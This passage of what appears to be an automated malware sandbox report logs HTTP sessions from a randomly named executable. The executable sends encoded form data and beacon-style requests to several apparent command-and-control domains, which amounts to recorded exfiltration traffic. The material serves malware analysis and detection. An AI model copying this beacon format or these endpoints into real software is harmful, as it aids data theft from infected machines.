                                35 | 192.168.2.6 | 49747 | 185.229.21.229 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:38.896657944 CEST | 1789 | OUT | POST /zzbw/ HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.cuddle-paws.co.uk
                                Referer: http://www.cuddle-paws.co.uk/zzbw/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:39.512681961 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:39 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                36 | 192.168.2.6 | 49748 | 185.229.21.229 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:41.438926935 CEST | 481 | OUT | GET /zzbw/?5L0=2bCPy0&jTZPp=SYw/9+A27wDBBFVE9oOer+iKSaxo18ff/QICalIUdVK4tpmTGYvTJqWTGl/IZc6vUKz9bMfWLss6gerKkQ1b4agtfT85HThTdgJ4Gv37GO/tiVjy/t6jt5abgYoy/lcD8efQawI= HTTP/1.1
                                Host: www.cuddle-paws.co.uk
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:42.069433928 CEST | 479 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:17:41 GMT
                                Server: Apache
                                Content-Length: 315
                                Connection: close
                                Content-Type: text/html; charset=iso-8859-1
                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                37 | 192.168.2.6 | 49749 | 178.63.50.103 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:47.272666931 CEST | 746 | OUT | POST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=mEcAUcdWIrDZEfhvGw/gtRAxwZtnI7Ev5AMUq0JxIRJWFrEgASTZrUHkfir9vehttTS9NdQ3q0tCm1ixpy0GfQ9m4he04GrxOT/EJ1D8AzQmiIvuKlCta6MEQLJQNmOo2eAzt1xECFlXHEDYE30/jKxy0hYQOA1m+BFjs2ahL5n38WBl7rl7yYrBF4mf5b+WREmJt1zhIv/7
                                May 28, 2024 07:17:47.939431906 CEST | 221 | IN | HTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:47 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                38 | 192.168.2.6 | 49750 | 178.63.50.103 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:49.818346977 CEST | 770 | OUT | POST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=mEcAUcdWIrDZE7dvEXDgqxAysJtnRrE05AAUqxpbJitWFK0gBTTZoUHkXCr4yugAtTePNfE3qyBCm0SxqFZQcg9ztxe2lWrxOT/EJ0mXAzImi4/uIA+uWaMDXLJQa2PA2eARt09uCGdXHETYFiA8qKxwqRZ8CVED5zRns3TNfqrn9gA/nYlYgILDF6+t57+8TEeJ/i/GHbaYPMUA1Vmw2e/vXD4ADaegHg==
                                May 28, 2024 07:17:50.460824013 CEST | 221 | IN | HTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:50 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                39 | 192.168.2.6 | 49751 | 178.63.50.103 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:53.125232935 CEST | 1783 | OUT | POST /l7wc/ HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.home-stroi0m.ru
                                Referer: http://www.home-stroi0m.ru/l7wc/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:53.773762941 CEST | 221 | IN | HTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:53 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                40 | 192.168.2.6 | 49752 | 178.63.50.103 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:17:55.662132025 CEST | 479 | OUT | GET /l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI+Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf+AOShDHzPE0tCU=&5L0=2bCPy0 HTTP/1.1
                                Host: www.home-stroi0m.ru
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:17:56.331805944 CEST | 381 | IN | HTTP/1.1 302 Found
                                Date: Tue, 28 May 2024 05:17:56 GMT
                                Content-Length: 0
                                Connection: close
                                cache-control: no-store
                                location: http://home-stroi0m.ru/l7wc/?jTZPp=rG0gXsVcMKnwL95DCAGLkXtixogTaqlVvgNhyV5MOQBbV9UvRUrQqDi5YjTtkNY5nkWwRtE2kxMBrn6VhlI%20Nig16EK01wjkMFHIaUG8fjlX1oi4FBapVJcXf%20AOShDHzPE0tCU%3D&5L0=2bCPy0
                                x-powered-by: flexbe.com
                                x-flexbe: gs1 [default] in 1 ms


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                41 | 192.168.2.6 | 49753 | 108.179.192.228 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:01.720040083 CEST | 743 | OUT | POST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=2oXm4gQhsoolmNfCD4IvtwduBtgloau5K+zMfAd4T2d2lQopA/Al37OImWoK6o/TrSW0z0tYDPALTWmCVQnxBY5fw1jgRNhb72wEoTrotDAyXIK3Se3xABwKuAYlJpnqTFl4DCiwrrOPu6kO9IvJyBmrz7buiO6/hMTf5y1aWaXWLCmeb5rIWWCs+Y8IydoAHtpzXMrltucR
                                May 28, 2024 07:18:02.251393080 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:02 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                42 | 192.168.2.6 | 49754 | 108.179.192.228 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:04.253452063 CEST | 767 | OUT | POST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=2oXm4gQhsool0+XCCZIv8QdtONgl6au9K+/MfBYjQE52lygpB9ol27OIu2oL0I+RrSaGz2JYDPULTUOCAzfyAI5noFjxethb72wEoT+9tDIyXbC3Q7DuDBwL5wYlNpnxTFlaDGiWrp2Pu70O9ZvKrxmt8barktDRj/i/l01kKqbnHUnEHKrrEGiu+ak6y9oqFtRzFbnCia5yuaZPgRfN5+um9emTmEmdFw==
                                May 28, 2024 07:18:04.753633976 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:04 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                43 | 192.168.2.6 | 49755 | 108.179.192.228 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:06.781691074 CEST | 1780 | OUT | POST /qy3g/ HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.betopfloor.com
                                Referer: http://www.betopfloor.com/qy3g/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:18:07.330986977 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:07 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Vary: Accept-Encoding
                                Content-Encoding: gzip
                                Content-Length: 4677
                                Content-Type: text/html


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                44 | 192.168.2.6 | 49756 | 108.179.192.228 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:09.316607952 CEST | 478 | OUT | GET /qy3g/?5L0=2bCPy0&jTZPp=7q/G7U1VqeddkNflMKI5sgAtLetf9b28atPRKW5PTHlUqHsLUKcur6rUhXkF0p+A/GSL70VLC9tJc0iDQkT9IaJtmga1X/Il1jAXyheslQ8xXpmoQqjsBC9sonYkPfqEZQpcDiM= HTTP/1.1
                                Host: www.betopfloor.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                May 28, 2024 07:18:09.834038019 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                Date: Tue, 28 May 2024 05:18:09 GMT
                                Server: Apache
                                Upgrade: h2,h2c
                                Connection: Upgrade, close
                                Last-Modified: Thu, 15 Sep 2022 09:59:43 GMT
                                Accept-Ranges: bytes
                                Content-Length: 11816
                                Vary: Accept-Encoding
                                Content-Type: text/html
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 - PAGE NOT FOUND</title>... Add Slide Outs --><script src="http://code.jquery.com/jquery-3.3.1.min.js"></script> <script src="/cgi-sys/js/simple-expand.min.js"></script> <style type="text/css"> body{padding:0;margin:0;font-family:helvetica;} #container{margin:20px auto;width:868px;} #container #top404{background-image:url('/cgi-sys/images/404top_w.jpg');background-repeat:no-repeat;width:868px;height:168px;} #container #mid404{background-image:url('/cgi-sys/images/404mid.gif');background-repeat:repeat-y;width:868px;} #container #mid404 #gatorbottom{position:relative;left:
                                May 28, 2024 07:18:09.834083080 CEST | 1236 | IN
                                Data Ascii: 39px;float:left;} #container #mid404 #xxx{float:left;padding:40px 397px 10px; margin: auto auto -10px auto} #container #mid404 #content{float:left;text-align:center;width:868px;} #container #mid404 #content #errorcode{f
                                May 28, 2024 07:18:09.834093094 CEST | 448 | IN
                                Data Ascii: gn: left;} #container #mid404 #content #accordion li {font-size: 90%;} #container #mid404 #content #accordion p {font-size: 95%; text-align: left;} #container #mid404 #content #accordion h3 {font-weight: bold;} #contain
                                May 28, 2024 07:18:09.834105015 CEST | 1236 | IN
                                Data Ascii: 19;} .code { background-color: #e5e5e5; border: 2px solid #ede1d1; padding: 5px 5px 5px 5px; text-align: left;} .shell{border: 2px solid gray; background-color: black; color: white; text-align: left;} </style> </head>
                                May 28, 2024 07:18:09.834115028 CEST | 1236 | IN
                                Data Ascii: taccess-backup and refreshing the site to see if that resolves the issue.</p><p>It is also possible that you have inadvertently deleted your document root or the your account may need to be recreated. Either way, please contact your
                                May 28, 2024 07:18:09.834126949 CEST | 448 | IN
                                Data Ascii: /Example/ and the names are case-sensitive.</p><h4><u>Broken Image</u></h4><p>When you have a missing image on your site you may see a box on your page with with a red <span style="color:#FF0000;"><strong>X</strong></span> wh
                                May 28, 2024 07:18:09.834137917 CEST | 1236 | IN
                                Data Ascii: <p>This varies by browser, if you do not see a box on your page with a red <span style="color:#FF0000;"><strong>X</strong></span> try right clicking on the page, then select View Page Info, and goto the Media Tab.</p><blockquote
                                May 28, 2024 07:18:09.834150076 CEST | 1236 | IN
                                Data Ascii: sp;<strong>Settings</strong> &gt; <strong>Permalinks</strong> (Note the current setting. If you are using a custom structure, copy or save the custom structure somewhere.)</li><li>Select&nbsp; <strong>Default</strong>.</li>
                                May 28, 2024 07:18:09.834161043 CEST | 1236 | IN
                                Data Ascii: # End WordPress</p></div><p>If your blog is showing the wrong domain name in links, redirecting to another site, or is missing images and style, these are all usually related to the same problem: you have the wron
                                May 28, 2024 07:18:09.834172964 CEST | 104 | IN
                                Data Ascii: <li>Edit the file on your computer and upload it to the server via FTP</li><li>Use an FTP pro
                                May 28, 2024 07:18:09.839232922 CEST | 1236 | IN
                                Data Ascii: gram's Edit Mode</li><li>Use SSH and a text editor</li><li>Use the File Manager in cPanel</li></ul><p>The easiest way to edit a .htaccess file for most people is through the File Manager in cPanel.</p>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                45 | 192.168.2.6 | 49757 | 149.88.84.60 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:15.208739996 CEST | 725 | OUT | POST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=jJ/SEMsp/N536y12I+saycE5ZY2nFZnrHhj/SrDjhQzpDr4eTk4G84mrk0DcckTWzR58AUeLMbw4PVklOF9qE3ffYEWKM1C16Rkvccj7RvlnomRJPir4qWPRqQ0uCFyE0y5w2Z8XruezPTK4YPHZMF5iNaxsSXzeFYEGuehCcCJv6qCHYiTiSp5SNyF3D82Q68KrafheRCkj


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                46 | 192.168.2.6 | 49758 | 149.88.84.60 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:17.738014936 CEST | 749 | OUT | POST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=jJ/SEMsp/N537Sl2Jfsa18E2HI2nepnvHhn/SqHJgjXpDLIeQl4G74mr8kDZB0TdzR10AWKLMb04PRglO2lpFnfdN0WIBVC16RkvccnCRpNnoWBJJDr5i2PStQ0uGFyA0y4l2ZM5roSzPSW4YbrWFF5gJawCalmEdOZCroIkIV1u28DdERTBA5ZQNwdFDc2648yrIIt5e2BAftMho7aPI7GxHl0p3BsXjg==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                47 | 192.168.2.6 | 49759 | 149.88.84.60 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:20.266633034 CEST | 1762 | OUT | POST /hsw0/ HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.bade.ink
                                Referer: http://www.bade.ink/hsw0/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                48 | 192.168.2.6 | 49760 | 149.88.84.60 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:22.943495989 CEST | 472 | OUT | GET /hsw0/?jTZPp=uLXyH8QWgplw+01MGt5z7ZtXboPXNqbkC1uKFcneqhr1T/4kMzskxZHx0kzyKUbp4FdXPGelQZ0lXUIJIylJCH/YaybQLXyPxH18cc3uRqVtxx5ALXmeuWDvi0AdBTC67hBeitw=&5L0=2bCPy0 HTTP/1.1
                                Host: www.bade.ink
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                49 | 192.168.2.6 | 49761 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:49.380784035 CEST | 767 | OUT | POST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 210
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=UcTKYjfU1WnnBT9cOujpcN2aOcJWF/gy/LvDtLUw+96J5TBlF3heBKPV2yCY7BlSe1prQxa52TJaAesSckXnNm/QXBdr7Dk/ooqyiDIgcjJhr1YzpccjeiFPQMZOX18JBUr+/8qSWvCy25Rfe9d4z0tGH/3IKWW8s/nYWDPvUH72EhxEyycrdY0sgO7Ur90dxcvqW+tosFQa


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                50 | 192.168.2.6 | 49762 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:51.922416925 CEST | 791 | OUT | POST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 234
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                                Data Ascii: jTZPp=UcTKYjfU1WnnTiNce9LpZt2ZC8JWevg2/LzDtKAG+OeJ52llXFZePqPV5SDckRkee1tjQwm52T1aAagSbXPkM2/SfhdtmTk/ooqyiHgGcjRh3Rczp9cgdiFIA8ZOAl8NBUrQ/920Ws2y28Vfesd79EtMIf2caFq3pNS4ewaNBl/GBXweuBcIPIUugMjmrd03zcXqEphPjx15r3tq7lD++yE2F5fV7oxnjA==


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                51 | 192.168.2.6 | 49763 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:54.501610041 CEST | 1804 | OUT | POST /d42u/ HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Accept-Encoding: gzip, deflate, br
                                Connection: close
                                Cache-Control: no-cache
                                Content-Type: application/x-www-form-urlencoded
                                Content-Length: 1246
                                Origin: http://www.futurereadyteaming.com
                                Referer: http://www.futurereadyteaming.com/d42u/
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                52 | 192.168.2.6 | 49764 | 3.33.130.190 | 80 | 1364 | C:\Program Files (x86)\SLBLxrBaueDpSQjBcAhvhoNXasTGWYvVGGNtaxzwFQAKDovaY\qFrNDyfVqdmmFLBeyXwBmuB.exe
                                Timestamp | Bytes transferred | Direction | Data
                                May 28, 2024 07:18:57.581764936 CEST | 486 | OUT | GET /d42u/?5L0=2bCPy0&jTZPp=Ze7qbULGym30DRtQWsDfUIjVKpc2N+ML3rKw6d8OwfGV5TB4Wy1SHsGQ3DzxzCIAckJPchaY62h3E/MXdBzELEbBfEli2wFapMH+8i0kZSl6sSBwn68EdR90A4BAIxslEVvZhZo= HTTP/1.1
                                Host: www.futurereadyteaming.com
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                Accept-Language: en-us
                                Connection: close
